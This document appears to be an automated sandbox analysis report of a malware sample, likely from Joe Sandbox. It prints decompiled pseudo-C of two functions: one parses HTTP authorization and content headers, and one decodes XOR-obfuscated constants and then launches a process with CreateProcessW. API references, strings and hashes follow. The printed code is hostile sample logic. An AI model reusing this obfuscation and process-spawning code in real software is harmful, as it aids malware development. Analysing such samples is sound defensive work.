				_t244 = E000007FE7FEF30B7DDA(_t550 + 0x240, _t483);
				E000007FE7FEF30C47F5(_t550 + 0x488,  *((intOrPtr*)(_t550 + 0x480)), _t483);
				_t580 = _t393;
				 *((long long*)(_t550 + 0x68)) = _t489;
				r13d = E000007FE7FEF30B7DDA(_t550 + 0x488, _t483);
				r13b = r13b ^ 0x00000001;
				r13b = r13b ^ _t244;
				r13b = r13b | 0x00000001;
				if (_t580 != 0) goto 0xf30b5737;
				if (_t393 == 0) goto 0xf30b5739;
				if (_t580 == 0) goto 0xf30b5739;
				if ( *((intOrPtr*)(_t550 + 0x50)) !=  *((intOrPtr*)(_t550 + 0x68))) goto 0xf30b5737;
				E000007FE7FEF30F2860((0 | _t580 != 0x00000000) ^ (_t244 & r13b & 0xffffff00 | _t393 != 0x00000000), _t393, _t580,  *((intOrPtr*)(_t550 + 0x50)));
				goto 0xf30b5739;
				r13b = r13b & 0x00000001;
				goto 0xf30b5741;
				r13d = 0;
				memcpy(_t319 + 0x16, 0, 0xb);
				if ( *((intOrPtr*)(_t550 + 0xa8)) !=  *((intOrPtr*)(_t550 + 0xa0))) goto 0xf30b577b;
				E000007FE7FEF30B1D45(0, 0,  *((intOrPtr*)(_t550 + 0xa8)) -  *((intOrPtr*)(_t550 + 0xa0)), _t550 + 0x98,  *((intOrPtr*)(_t550 + 0xa8)),  *((intOrPtr*)(_t550 + 0x50)));
				_t532 = _t544;
				memcpy(0x16, 0, 0xb);
				 *((long long*)(_t550 + 0xa8)) =  *((intOrPtr*)(_t550 + 0xa8)) + 1;
				 *((long long*)(_t550 + 0x600)) = 0;
				E000007FE7FEF30B66AC();
				_t422 =  *((intOrPtr*)(_t550 + 0x4e0));
				 *((long long*)(_t550 + 0x50)) =  *((intOrPtr*)(_t550 + 0x4e8));
				_t581 =  *((intOrPtr*)(_t550 + 0x4f0));
				if (_t581 == 0) goto 0xf30b5859;
				_t546 =  ~_t581;
				_t515 = _t422;
				r8d = 0xe;
				E000007FE7FEF30A694E( *((intOrPtr*)(_t550 + 0x4e8)), _t515, "content-lengthcontent-encoding",  *((intOrPtr*)(_t550 + 0x50)), _t483);
				if (1 != 0) goto 0xf30b5839;
				r8d = 0xd;
				E000007FE7FEF30A694E( *((intOrPtr*)(_t550 + 0x4e8)), _t515, "authorizationAuthorizationBasic ",  *((intOrPtr*)(_t550 + 0x50)), _t483);
				if (1 == 0) goto 0xf30b5839;
				if (_t532 + _t546 + 1 != 1) goto 0xf30b57e9;
				goto 0xf30b591d;
				if ( *((long long*)(_t515 + 0x28)) == 0) goto 0xf30b585d;
				HeapFree(??, ??, ??);
				goto 0xf30b585d;
				if (_t532 + 1 != _t581) goto 0xf30b586a;
				_t534 = _t581;
				goto 0xf30b58f2;
				_t519 = (_t534 << 5) + _t422;
				r8d = 0xe;
				E000007FE7FEF30A694E(_t532 + _t546 + 1, _t519, "content-lengthcontent-encoding",  *((intOrPtr*)(_t515 + 0x20)), _t575);
				if (1 != 0) goto 0xf30b58ca;
				r8d = 0xd;
				E000007FE7FEF30A694E(_t532 + _t546 + 1, _t519, "authorizationAuthorizationBasic ",  *((intOrPtr*)(_t515 + 0x20)), _t575);
				if (1 == 0) goto 0xf30b58ca;
				asm("movups xmm0, [edi]");
				asm("movups xmm1, [edi+0x10]");
				asm("movups [edi+eax+0x10], xmm1");
				asm("movups [ecx], xmm0");
				goto 0xf30b58e6;
				_t547 = _t546 + 1;
				if ( *((long long*)(_t519 + 8)) == 0) goto 0xf30b58e6;
				HeapFree(??, ??, ??);
				if (_t581 != _t534 + 1) goto 0xf30b5874;
				if (_t547 == 0) goto 0xf30b591d;
				E000007FE7FEF30F1E10();
				_t282 =  *((intOrPtr*)(_t550 + 0x60));
				 *((long long*)(_t550 + 0x370)) = _t422;
				 *((long long*)(_t550 + 0x378)) =  *((intOrPtr*)(_t550 + 0x50));
				 *((long long*)(_t550 + 0x380)) = _t581 - _t547;
				asm("movaps xmm0, [esp+0x2c0]");
				 *((intOrPtr*)(_t550 + 0x48)) =  *((intOrPtr*)(_t550 + 0x500));
				 *((long long*)(_t550 + 0x40)) =  *((intOrPtr*)(_t550 + 0x4f8));
				asm("movups [esp+0x30], xmm0");
				 *((long long*)(_t550 + 0x28)) = _t550 + 0x370;
				 *((long long*)(_t550 + 0x20)) = _t550 + 0x240;
				E000007FE7FEF30B67DC(_t282,  *((intOrPtr*)(_t550 + 0x500)), 0, 0x16, 0, __esp + 0x24, _t550 + 0x240, _t550 + 0x600, _t550 + 0x460, _t595, _t590, _t577, _t578);
				E000007FE7FEF30428BC(_t547, _t550 + 0x460);
				if (_t282 == 0) goto 0xf30b59da;
				if ( *((long long*)(_t550 + 0x478)) == 0) goto 0xf30b59da;
				HeapFree(??, ??, ??);
				r8d = 0xb0;
				E000007FE7FEF30F1E10();
				if ( *((intOrPtr*)(_t550 + 0x58)) == 0) goto 0xf30b5a12;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t550 + 0x248)) == 0) goto 0xf30b5a34;
				HeapFree(??, ??, ??);
				E000007FE7FEF30A7958();
				goto 0xf30b50ec;
				 *((long long*)(_t550 + 0x230)) =  *((intOrPtr*)(_t550 + 0x530));
				asm("movaps xmm0, [esp+0x520]");
				asm("movaps [esp+0x220], xmm0");
				asm("movups xmm0, [ecx+0x28]");
				asm("movups xmm1, [ecx+0x34]");
				asm("movups [esp+0x2ac], xmm1");
				asm("movaps [esp+0x2a0], xmm0");
				 *((long long*)(_t550 + 0x180)) =  *((intOrPtr*)(_t550 + 0x588));
				asm("movups xmm0, [ecx+0x48]");
				asm("movups xmm1, [ecx+0x58]");
				asm("movaps [esp+0x170], xmm1");
				asm("movaps [esp+0x160], xmm0");
				asm("movups xmm0, [ecx+0x81]");
				asm("movups xmm1, [ecx+0x91]");
				asm("movups xmm2, [ecx+0xa0]");
				asm("movups [esp+0x1df], xmm2");
				asm("movaps [esp+0x1d0], xmm1");
				asm("movaps [esp+0x1c0], xmm0");
				asm("movups xmm0, [eax]");
				asm("movaps [esp+0x340], xmm0");
				if ( *((long long*)(_t550 + 0x248)) == 0) goto 0xf30b5bb3;
				HeapFree(??, ??, ??);
				goto 0xf30b5bb3;
				 *((long long*)(_t550 + 0x230)) =  *((intOrPtr*)(_t550 + 0x530));
				asm("movaps xmm0, [esp+0x520]");
				asm("movaps [esp+0x220], xmm0");
				asm("inc ecx");
				asm("inc ecx");
				asm("movups [esp+0x2ac], xmm1");
				asm("movaps [esp+0x2a0], xmm0");
				 *((long long*)(_t550 + 0x180)) =  *((intOrPtr*)(_t550 + 0x588));
				asm("inc ecx");
				asm("inc ecx");
				asm("movaps [esp+0x170], xmm1");
				asm("movaps [esp+0x160], xmm0");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("movaps [esp+0x1c0], xmm0");
				asm("movaps [esp+0x1d0], xmm1");
				asm("movups [esp+0x1df], xmm2");
				asm("movups xmm0, [eax]");
				asm("movaps [esp+0x340], xmm0");
				E000007FE7FEF30A7B3C( *((intOrPtr*)(_t550 + 0x50)),  *((intOrPtr*)(_t550 + 0x80)));
				if ( *((long long*)(_t550 + 0x68)) == 0) goto 0xf30b5bfa;
				HeapFree(??, ??, ??);
				 *((long long*)(_t550 + 0xc0)) =  *((intOrPtr*)(_t550 + 0x230));
				asm("movaps xmm0, [esp+0x220]");
				asm("movaps [esp+0xb0], xmm0");
				asm("movaps xmm0, [esp+0x2a0]");
				asm("movaps [esp+0xd0], xmm0");
				asm("movups xmm0, [esp+0x2ac]");
				asm("movups [esp+0xdc], xmm0");
				asm("movaps xmm0, [esp+0x160]");
				asm("movaps xmm1, [esp+0x170]");
				asm("movaps [esp+0x130], xmm0");
				asm("movaps [esp+0x140], xmm1");
				 *((long long*)(_t550 + 0x150)) =  *((intOrPtr*)(_t550 + 0x180));
				asm("movaps xmm0, [esp+0x1c0]");
				asm("movaps xmm1, [esp+0x1d0]");
				asm("movaps [esp+0x2e0], xmm0");
				asm("movaps [esp+0x2f0], xmm1");
				asm("movups xmm0, [esp+0x1df]");
				asm("movups [esp+0x2ff], xmm0");
				asm("movaps xmm0, [esp+0x340]");
				asm("movaps [esp+0x200], xmm0");
				E000007FE7FEF30A7A75();
				_t470 =  *((intOrPtr*)(_t550 + 0x88));
				 *((long long*)(_t470 + 0x18)) =  *((intOrPtr*)(_t550 + 0xc0));
				asm("movaps xmm0, [esp+0xb0]");
				asm("movups [ecx+0x8], xmm0");
				 *((long long*)(_t470 + 0x20)) =  *((intOrPtr*)(_t550 + 0x70));
				 *((long long*)(_t470 + 0x28)) =  *((intOrPtr*)(_t550 + 0x78));
				asm("movups xmm0, [esp+0xdc]");
				asm("movups [ecx+0x3c], xmm0");
				asm("movaps xmm0, [esp+0xd0]");
				asm("movups [ecx+0x30], xmm0");
				 *((intOrPtr*)(_t470 + 0x4c)) =  *((intOrPtr*)(_t550 + 0x58));
				asm("movaps xmm0, [esp+0x130]");
				asm("movaps xmm1, [esp+0x140]");
				asm("movups [ecx+0x50], xmm0");
				asm("movups [ecx+0x60], xmm1");
				 *((long long*)(_t470 + 0x70)) =  *((intOrPtr*)(_t550 + 0x150));
				 *((long long*)(_t470 + 0x78)) = _t595;
				 *((long long*)(_t470 + 0x80)) =  *((intOrPtr*)(_t550 + 0x60));
				 *(_t470 + 0x88) = r13b;
				asm("movaps xmm0, [esp+0x2e0]");
				asm("movaps xmm1, [esp+0x2f0]");
				asm("movups [ecx+0x89], xmm0");
				asm("movups [ecx+0x99], xmm1");
				asm("movups xmm0, [esp+0x2ff]");
				asm("movups [ecx+0xa8], xmm0");
				 *((long long*)(_t470 + 0xb8)) =  *((intOrPtr*)(_t550 + 0x98));
				 *((long long*)(_t470 + 0xc0)) =  *((intOrPtr*)(_t550 + 0xa0));
				 *((long long*)(_t470 + 0xc8)) =  *((intOrPtr*)(_t550 + 0xa8));
				 *((long long*)(_t470 + 0xd0)) =  *((intOrPtr*)(_t550 + 0x368));
				asm("movaps xmm0, [esp+0x200]");
				asm("movups [ecx+0xd8], xmm0");
				 *_t470 = 0;
				_t541 =  *((intOrPtr*)(_t550 + 0x1f8));
				E000007FE7FEF30428BC( *((long long*)(_t550 + 0x68)), _t541);
				if ( *((long long*)(_t541 + 0x18)) == 0) goto 0xf30b5dd4;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t541 + 0x30)) == 0) goto 0xf30b5dee;
				return HeapFree(??, ??, ??);
			}

0x7fef30b4fba
0x7fef30b4fba
0x7fef30b4fd3
0x7fef30b4fdb
0x7fef30b4fde
0x7fef30b4fe2
0x7fef30b4fe6
0x7fef30b4fee
0x7fef30b4ff2
0x7fef30b4ff6
0x7fef30b5008
0x7fef30b5015
0x7fef30b501d
0x7fef30b5021
0x7fef30b5025
0x7fef30b5029
0x7fef30b5033
0x7fef30b5037
0x7fef30b503b
0x7fef30b5040
0x7fef30b5045
0x7fef30b504a
0x7fef30b5052
0x7fef30b5062
0x7fef30b506d
0x7fef30b507a
0x7fef30b5086
0x7fef30b508b
0x7fef30b508f
0x7fef30b509c
0x7fef30b50a0
0x7fef30b50a3
0x7fef30b50ab
0x7fef30b50b2
0x7fef30b50b5
0x7fef30b50c9
0x7fef30b50d1
0x7fef30b50dc
0x7fef30b50ec
0x7fef30b50f4
0x7fef30b50fc
0x7fef30b5104
0x7fef30b5112
0x7fef30b511b
0x7fef30b512d
0x7fef30b5135
0x7fef30b5139
0x7fef30b5141
0x7fef30b5149
0x7fef30b5151
0x7fef30b5155
0x7fef30b5159
0x7fef30b5161
0x7fef30b516c
0x7fef30b5178
0x7fef30b5180
0x7fef30b5184
0x7fef30b5188
0x7fef30b5190
0x7fef30b51a0
0x7fef30b51a8
0x7fef30b51b0
0x7fef30b51b7
0x7fef30b51be
0x7fef30b51c5
0x7fef30b51cd
0x7fef30b51d5
0x7fef30b51dd
0x7fef30b51e5
0x7fef30b51ed
0x7fef30b51f5
0x7fef30b51fd
0x7fef30b5202
0x7fef30b5207
0x7fef30b520c
0x7fef30b5211
0x7fef30b5216
0x7fef30b521b
0x7fef30b5223
0x7fef30b5229
0x7fef30b5230
0x7fef30b5238
0x7fef30b5240
0x7fef30b5250
0x7fef30b5258
0x7fef30b5260
0x7fef30b5268
0x7fef30b5270
0x7fef30b5275
0x7fef30b527d
0x7fef30b5282
0x7fef30b5292
0x7fef30b5296
0x7fef30b529e
0x7fef30b52a6
0x7fef30b52ab
0x7fef30b52b0
0x7fef30b52b8
0x7fef30b52c0
0x7fef30b52c8
0x7fef30b52d0
0x7fef30b52d8
0x7fef30b52e0
0x7fef30b52e8
0x7fef30b52f0
0x7fef30b52f8
0x7fef30b5300
0x7fef30b5308
0x7fef30b5310
0x7fef30b5318
0x7fef30b5328
0x7fef30b533d
0x7fef30b5345
0x7fef30b534b
0x7fef30b535c
0x7fef30b5362
0x7fef30b536a
0x7fef30b5378
0x7fef30b5386
0x7fef30b538e
0x7fef30b539e
0x7fef30b53a6
0x7fef30b53ac
0x7fef30b53af
0x7fef30b53b7
0x7fef30b53c1
0x7fef30b53d1
0x7fef30b53d9
0x7fef30b53e4
0x7fef30b53f2
0x7fef30b53ff
0x7fef30b5405
0x7fef30b5415
0x7fef30b5424
0x7fef30b5433
0x7fef30b5440
0x7fef30b5448
0x7fef30b5458
0x7fef30b5460
0x7fef30b5473
0x7fef30b5478
0x7fef30b5483
0x7fef30b548b
0x7fef30b5493
0x7fef30b54ad
0x7fef30b54b0
0x7fef30b54b5
0x7fef30b54c1
0x7fef30b54c3
0x7fef30b54d8
0x7fef30b54db
0x7fef30b54de
0x7fef30b54e6
0x7fef30b54ee
0x7fef30b54f6
0x7fef30b54fe
0x7fef30b5506
0x7fef30b550a
0x7fef30b550e
0x7fef30b5516
0x7fef30b5525
0x7fef30b5529
0x7fef30b5531
0x7fef30b5539
0x7fef30b5541
0x7fef30b5549
0x7fef30b5551
0x7fef30b5559
0x7fef30b555d
0x7fef30b5565
0x7fef30b5568
0x7fef30b556f
0x7fef30b5577
0x7fef30b558c
0x7fef30b5596
0x7fef30b55a2
0x7fef30b55a4
0x7fef30b55a8
0x7fef30b55ae
0x7fef30b55be
0x7fef30b55c0
0x7fef30b55d1
0x7fef30b55d8
0x7fef30b55de
0x7fef30b55f4
0x7fef30b55ff
0x7fef30b5612
0x7fef30b5614
0x7fef30b5618
0x7fef30b5621
0x7fef30b5623
0x7fef30b5630
0x7fef30b5638
0x7fef30b563d
0x7fef30b5643
0x7fef30b5645
0x7fef30b564d
0x7fef30b565b
0x7fef30b5666
0x7fef30b5679
0x7fef30b567f
0x7fef30b5681
0x7fef30b568b
0x7fef30b568f
0x7fef30b569e
0x7fef30b56a3
0x7fef30b56b4
0x7fef30b56bc
0x7fef30b56c4
0x7fef30b56d6
0x7fef30b56db
0x7fef30b56de
0x7fef30b56eb
0x7fef30b56ee
0x7fef30b56f7
0x7fef30b56fa
0x7fef30b570b
0x7fef30b5712
0x7fef30b5717
0x7fef30b5723
0x7fef30b572b
0x7fef30b5735
0x7fef30b5739
0x7fef30b573c
0x7fef30b573e
0x7fef30b5751
0x7fef30b5764
0x7fef30b576e
0x7fef30b578c
0x7fef30b578f
0x7fef30b5795
0x7fef30b579d
0x7fef30b57b4
0x7fef30b57b9
0x7fef30b57c9
0x7fef30b57ce
0x7fef30b57d9
0x7fef30b57de
0x7fef30b57e6
0x7fef30b57e9
0x7fef30b57f9
0x7fef30b5800
0x7fef30b5802
0x7fef30b5812
0x7fef30b581c
0x7fef30b5830
0x7fef30b5834
0x7fef30b5843
0x7fef30b5851
0x7fef30b5857
0x7fef30b5860
0x7fef30b5862
0x7fef30b5865
0x7fef30b5871
0x7fef30b5874
0x7fef30b5884
0x7fef30b588b
0x7fef30b588d
0x7fef30b589d
0x7fef30b58a7
0x7fef30b58b6
0x7fef30b58b9
0x7fef30b58c0
0x7fef30b58c5
0x7fef30b58c8
0x7fef30b58ca
0x7fef30b58d2
0x7fef30b58e0
0x7fef30b58f0
0x7fef30b58f5
0x7fef30b5918
0x7fef30b592d
0x7fef30b5939
0x7fef30b5941
0x7fef30b5949
0x7fef30b5960
0x7fef30b5968
0x7fef30b596c
0x7fef30b5971
0x7fef30b597e
0x7fef30b598b
0x7fef30b59a7
0x7fef30b59af
0x7fef30b59b6
0x7fef30b59c1
0x7fef30b59d4
0x7fef30b59da
0x7fef30b59e6
0x7fef30b59fe
0x7fef30b5a0c
0x7fef30b5a1b
0x7fef30b5a2e
0x7fef30b5a37
0x7fef30b5a3c
0x7fef30b5a49
0x7fef30b5a51
0x7fef30b5a59
0x7fef30b5a69
0x7fef30b5a6d
0x7fef30b5a71
0x7fef30b5a79
0x7fef30b5a85
0x7fef30b5a8d
0x7fef30b5a91
0x7fef30b5a95
0x7fef30b5a9d
0x7fef30b5aa5
0x7fef30b5aac
0x7fef30b5ab3
0x7fef30b5aba
0x7fef30b5ac2
0x7fef30b5aca
0x7fef30b5ada
0x7fef30b5add
0x7fef30b5aee
0x7fef30b5b05
0x7fef30b5b0b
0x7fef30b5b18
0x7fef30b5b20
0x7fef30b5b28
0x7fef30b5b30
0x7fef30b5b35
0x7fef30b5b3a
0x7fef30b5b42
0x7fef30b5b4e
0x7fef30b5b56
0x7fef30b5b5b
0x7fef30b5b60
0x7fef30b5b68
0x7fef30b5b70
0x7fef30b5b78
0x7fef30b5b80
0x7fef30b5b88
0x7fef30b5b90
0x7fef30b5b98
0x7fef30b5ba8
0x7fef30b5bab
0x7fef30b5bdb
0x7fef30b5be6
0x7fef30b5bf4
0x7fef30b5c02
0x7fef30b5c0a
0x7fef30b5c12
0x7fef30b5c1a
0x7fef30b5c22
0x7fef30b5c2a
0x7fef30b5c32
0x7fef30b5c3a
0x7fef30b5c42
0x7fef30b5c4a
0x7fef30b5c52
0x7fef30b5c62
0x7fef30b5c6a
0x7fef30b5c72
0x7fef30b5c7a
0x7fef30b5c82
0x7fef30b5c8a
0x7fef30b5c92
0x7fef30b5c9a
0x7fef30b5ca2
0x7fef30b5cb2
0x7fef30b5cbf
0x7fef30b5cc7
0x7fef30b5ccb
0x7fef30b5cd3
0x7fef30b5cdc
0x7fef30b5ce5
0x7fef30b5ce9
0x7fef30b5cf1
0x7fef30b5cf5
0x7fef30b5cfd
0x7fef30b5d05
0x7fef30b5d08
0x7fef30b5d10
0x7fef30b5d18
0x7fef30b5d1c
0x7fef30b5d28
0x7fef30b5d2c
0x7fef30b5d35
0x7fef30b5d3c
0x7fef30b5d43
0x7fef30b5d4b
0x7fef30b5d53
0x7fef30b5d5a
0x7fef30b5d61
0x7fef30b5d69
0x7fef30b5d70
0x7fef30b5d77
0x7fef30b5d7e
0x7fef30b5d8d
0x7fef30b5d94
0x7fef30b5d9c
0x7fef30b5da3
0x7fef30b5daa
0x7fef30b5db5
0x7fef30b5dbf
0x7fef30b5dce
0x7fef30b5dd9
0x7fef30b5e02

APIs

HeapFree.KERNEL32 ref: 000007FEF30B5BF4
HeapFree.KERNEL32 ref: 000007FEF30B5DCE
HeapFree.KERNEL32 ref: 000007FEF30B5DE8
HeapFree.KERNEL32 ref: 000007FEF30B612F
HeapFree.KERNEL32 ref: 000007FEF30B629D
HeapFree.KERNEL32 ref: 000007FEF30B6463

Part of subcall function 000007FEF30B4CED: HeapFree.KERNEL32 ref: 000007FEF30B4D67

Strings

HEAD, xrefs: 000007FEF30B561A
content-lengthcontent-encoding, xrefs: 000007FEF30B57F2, 000007FEF30B587D
authorizationAuthorizationBasic , xrefs: 000007FEF30B580B, 000007FEF30B5896

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: HEAD$authorizationAuthorizationBasic $content-lengthcontent-encoding
API String ID: 3298025750-1461990652
Opcode ID: 0c335463d3241dbafca25caa769478a011ad3032b733dab383e0c0d7bff82fa5
Instruction ID: 29ccb89407bc7b17228015c2c94fd2e4233ace164911dca1bd005c8f5f3c8943
Opcode Fuzzy Hash: 0c335463d3241dbafca25caa769478a011ad3032b733dab383e0c0d7bff82fa5
Instruction Fuzzy Hash: B3C22E3290DBC485E6728B19E4453EAB3A5FB98748F049216DFCC52B29EF39D1D6DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304E75F Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 261
memoryprocessCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E000007FE7FEF304E75F(void* __ebp, void* __eflags, intOrPtr* __rcx, signed int __rdx, void* __r8) {
				int _t109;
				signed long long* _t176;
				signed long long* _t178;
				signed long long* _t181;
				intOrPtr _t187;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				long long _t205;
				signed long long _t218;
				signed long long _t222;
				signed long long _t226;
				intOrPtr _t227;
				signed long long _t233;
				signed long long _t236;
				intOrPtr* _t241;
				void* _t242;
				void* _t243;
				intOrPtr* _t251;
				signed long long** _t252;
				long long _t253;
				void* _t254;
				intOrPtr _t256;
				intOrPtr* _t271;

				_t255 = __r8;
				 *((long long*)(_t254 + 0xc0)) = 0xf30f3e2a;
				_t176 =  *((intOrPtr*)(_t254 + 0xc0));
				asm("dec eax");
				_t271 = __rcx;
				_t218 = (__rdx ^  *0xf319c310) + 0x43f9ef7d & _t236;
				E000007FE7FEF30694DF(0, _t176, __rcx);
				 *(_t254 + 0x80) = _t218;
				_t176[0] =  !( *(_t176 + _t218 + 4));
				 *_t176 = 0x9d0eda3b;
				_t187 =  *0xf319ce70; // 0x77620000
				r8d = 5;
				 *(_t254 + 0x50) = _t176;
				E000007FE7FEF304BE45(_t187, _t176, __r8);
				 *((long long*)(_t254 + 0xc0)) = 0xf30f5b65;
				_t189 =  *((intOrPtr*)(_t254 + 0xc0));
				 *(_t254 + 0x68) = _t176;
				asm("dec eax");
				_t222 = 0xc000c575 +  *0xf319c318 & _t236;
				E000007FE7FEF30694DF(0, _t176, _t189);
				 *(_t254 + 0x78) = _t222;
				 *_t176 = 0xea8a4652 ^  *(_t189 + 0xc000c575);
				_t176[1] = 0x10f85704 ^  *(_t189 + 0xffffffffc000c57d);
				_t176[1] =  *(_t189 + _t222 + 0xc) & 0x0000ffff ^ 0x00009b08;
				_t190 =  *0xf319ce70; // 0x77620000
				r8d = 0xe;
				E000007FE7FEF304BE45(_t190, _t176, _t255);
				 *((long long*)(_t254 + 0xc0)) = 0xf30f5b66;
				_t192 =  *((intOrPtr*)(_t254 + 0xc0));
				_t226 = ( *0xf319c320 * 0x70bcadd7 << 0x00000020 | 0x17a4c1c8 +  *0xf319c320 * 0x70bcadd7) << 0x1 & _t236;
				 *(_t254 + 0x58) = _t176;
				E000007FE7FEF30694DF(0, _t176, _t192);
				 *_t176 = 0x5a33a324 ^  *(_t192 + _t226);
				_t176[1] = 0x938ba1c9 ^  *(_t192 + _t226 + 8);
				 *((long long*)(_t254 + 0xc0)) = 0xf30f439e;
				_t178 =  *((intOrPtr*)(_t254 + 0xc0));
				 *(_t254 + 0x70) = _t226;
				asm("dec eax");
				E000007FE7FEF30694DF(0, _t178, (0xe4307ffa ^  *0xf319c328) + 0xa0527744 & _t236);
				 *(_t254 + 0x60) = _t226;
				 *_t178 = 0x42db2984 ^ _t178[0xfffffffffc861000];
				_t227 =  *0xf319c078; // 0x3356b0
				_t256 =  *0xf319c088; // 0xa
				E000007FE7FEF30515F0(_t178, _t254 + 0x90, _t227, _t256);
				 *((long long*)(_t254 + 0x88)) = _t271;
				_t251 = _t254 + 0xa8;
				E000007FE7FEF30515F0(_t178, _t251,  *_t271,  *((intOrPtr*)(_t271 + 0x10)));
				if ( *_t251 != 0) goto 0xf304e992;
				if ( *((intOrPtr*)(_t254 + 0x90)) != 0) goto 0xf304e9b7;
				_t252 = _t254 + 0xc0;
				 *_t252 = _t176;
				_t252[1] = 0xc;
				_t252[2] = " accept-encodinggziprangeRequest deadline overflowed";
				_t252[3] = 1;
				_t252[4] =  *((intOrPtr*)(_t254 + 0xb0));
				_t252[5] =  *((intOrPtr*)(_t254 + 0xb8));
				_t252[6] =  *((intOrPtr*)(_t254 + 0x98));
				_t252[7] =  *((intOrPtr*)(_t254 + 0xa0));
				_t252[8] = _t178;
				_t252[9] = 8;
				_t241 = _t254 + 0x148;
				r8d = 5;
				E000007FE7FEF3043157(_t252,  *((intOrPtr*)(_t271 + 0x10)));
				_t181 =  *_t241;
				 *_t252 = _t181;
				_t252[1] =  *((intOrPtr*)(_t241 + 0x10)) + _t181;
				_t252[2] = 0;
				_t242 = _t254 + 0x130;
				_t253 = _t254 + 0xc0;
				E000007FE7FEF3042D24(_t242, _t253);
				if ( *((intOrPtr*)(_t242 + 0x10)) !=  *((intOrPtr*)(_t242 + 8))) goto 0xf304ea6b;
				_t243 = _t254 + 0x130;
				E000007FE7FEF3043262( *((intOrPtr*)(_t242 + 0x10)));
				_t233 =  *((intOrPtr*)(_t243 + 0x10));
				 *((short*)( *((intOrPtr*)(_t254 + 0x130)) + _t233 * 2)) = 0;
				 *((long long*)(_t254 + 0x140)) = _t233 + 1;
				 *(_t254 + 0x120) = _t181;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x110], xmm0");
				asm("movaps [esp+0x100], xmm0");
				asm("movaps [esp+0xf0], xmm0");
				asm("movaps [esp+0xe0], xmm0");
				asm("movaps [esp+0xd0], xmm0");
				asm("movaps [esp+0xc0], xmm0");
				_t205 = _t254 + 0x160;
				 *(_t205 + 0x10) = _t181;
				asm("movaps [ecx], xmm0");
				 *((intOrPtr*)(_t254 + 0xc0)) = 0x68;
				 *((intOrPtr*)(_t254 + 0xfc)) = 1;
				 *((short*)(_t254 + 0x100)) = 0;
				 *((long long*)(_t254 + 0x48)) = _t205;
				 *((long long*)(_t254 + 0x40)) = _t253;
				asm("movups [esp+0x30], xmm0");
				 *((intOrPtr*)(_t254 + 0x28)) = 0x208;
				 *((intOrPtr*)(_t254 + 0x20)) = 0;
				r8d = 0;
				r9d = 0; // executed
				_t109 = CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				SleepEx(??, ??);
				if ( *((intOrPtr*)(_t243 + 8)) == 0) goto 0xf304eb3d;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t254 + 0x150)) == 0) goto 0xf304eb5f;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t254 + 0xa8)) == 0) goto 0xf304eb86;
				if ( *((long long*)(_t254 + 0xb0)) == 0) goto 0xf304eb86;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t254 + 0x90)) == 0) goto 0xf304ebad;
				if ( *((long long*)(_t254 + 0x98)) == 0) goto 0xf304ebad;
				HeapFree(??, ??, ??);
				if ( *(_t254 + 0x60) == 0) goto 0xf304ebc7;
				HeapFree(??, ??, ??);
				if ( *(_t254 + 0x70) == 0) goto 0xf304ebe1;
				HeapFree(??, ??, ??);
				if ( *(_t254 + 0x78) == 0) goto 0xf304ebfb;
				HeapFree(??, ??, ??);
				if ( *(_t254 + 0x80) == 0) goto 0xf304ec1a;
				HeapFree(??, ??, ??);
				if ( *((long long*)( *((intOrPtr*)(_t254 + 0x88)) + 8)) == 0) goto 0xf304ec3b;
				return HeapFree(??, ??, ??) & 0xffffff00 | _t109 != 0x00000000;
			}

0x7fef304e75f
0x7fef304e779
0x7fef304e781
0x7fef304e79c
0x7fef304e7a0
0x7fef304e7a8
0x7fef304e7c3
0x7fef304e7c8
0x7fef304e7d0
0x7fef304e7d3
0x7fef304e7d5
0x7fef304e7dc
0x7fef304e7e2
0x7fef304e7ea
0x7fef304e7f6
0x7fef304e7fe
0x7fef304e814
0x7fef304e819
0x7fef304e81d
0x7fef304e849
0x7fef304e851
0x7fef304e856
0x7fef304e859
0x7fef304e85c
0x7fef304e860
0x7fef304e867
0x7fef304e870
0x7fef304e87c
0x7fef304e884
0x7fef304e8b6
0x7fef304e8c7
0x7fef304e8dc
0x7fef304e8e4
0x7fef304e8e7
0x7fef304e8f1
0x7fef304e8f9
0x7fef304e90f
0x7fef304e91b
0x7fef304e937
0x7fef304e93f
0x7fef304e944
0x7fef304e947
0x7fef304e94e
0x7fef304e95d
0x7fef304e965
0x7fef304e971
0x7fef304e97c
0x7fef304e988
0x7fef304e9ad
0x7fef304e9b7
0x7fef304e9bf
0x7fef304e9c3
0x7fef304e9d2
0x7fef304e9d6
0x7fef304e9de
0x7fef304e9e2
0x7fef304e9e6
0x7fef304e9ea
0x7fef304e9ee
0x7fef304e9f2
0x7fef304e9fa
0x7fef304ea02
0x7fef304ea0e
0x7fef304ea13
0x7fef304ea1d
0x7fef304ea21
0x7fef304ea25
0x7fef304ea2b
0x7fef304ea33
0x7fef304ea41
0x7fef304ea51
0x7fef304ea53
0x7fef304ea5e
0x7fef304ea67
0x7fef304ea75
0x7fef304ea7d
0x7fef304ea85
0x7fef304ea8d
0x7fef304ea90
0x7fef304ea98
0x7fef304eaa0
0x7fef304eaa8
0x7fef304eab0
0x7fef304eab8
0x7fef304eac0
0x7fef304eac8
